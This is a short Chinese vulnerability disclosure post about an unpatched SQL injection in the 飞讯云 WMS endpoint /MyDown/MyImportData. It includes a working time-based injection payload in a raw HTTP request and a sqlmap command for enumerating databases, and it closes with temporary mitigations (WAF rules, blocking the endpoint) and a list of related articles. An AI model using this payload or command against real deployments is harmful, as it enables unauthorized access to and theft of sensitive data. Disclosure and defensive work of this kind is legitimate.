【飞讯云MyImportData前台SQL注入已复现】

一、漏洞简介

飞讯云-WMS 接口:/MyDown/MyImportData?opeid=1处存在前台SQL注入漏洞,攻击者可以通过sql注入攻击获取到敏感数据,账号信息等,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

二、poc利用

复制代码
GET /MyDown/MyImportData?opeid=1%27+WAITFOR+DELAY+'0:0:10'-- HTTP/1.1
Host: {host}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: language=zh-CN; ASP.NET_SessionId=fszg0ra1zc3tgeepea3p4ujz
Connection: close

sqlmap验证:

复制代码
python sqlmap.py -u http://xxxx.xxx.xxx:8080/MyDown/MyImportData?opeid=1 -p openid --dbs

三、临时措施

厂商未发布补丁,建议:

1、waf设置规则防护

2、禁止对/MyDown/MyImportData?opeid=1接口的访问

相关推荐
虹科网络安全5 小时前
Redis 安全公告:CVE-2026-81934 TLS 处理漏洞及修复建议
网络·人工智能·网络安全
小程序设计6 小时前
某师范学院网络规划与设计
网络·安全
山东科恩光电6 小时前
安全触边技术在提升机械设备安全防护中的应用探讨
安全
jimmyleeee8 小时前
大模型安全之十五:AI Access Control:当“门禁”遇上会思考的系统
人工智能·安全
jimmyleeee9 小时前
大模型安全之十六:AI Security Posture Management
人工智能·安全
德迅云安全杨德俊10 小时前
高防IP:构建“防护-加速-管控”三位一体的全链路安全体系
网络·安全·ddos
2501_9160088910 小时前
全平台抓包工具,Windows、iPhone、Linux三个平台抓包测试
网络协议·计算机网络·网络安全·ios·adb·https·udp
小程序设计11 小时前
5G移动网络中设备与设备通信技术研究
网络·安全
Dachui_112212 小时前
ZeroNews LFS 使用教程:NAS 文件发布为公网 HTTPS 文件空间,不传网盘、按人授权、免登录分享
运维·网络安全·文件共享·团队协作·nas
努力的lpp13 小时前
【攻击溯源四步法 · 面试讲解稿】
网络·网络协议·安全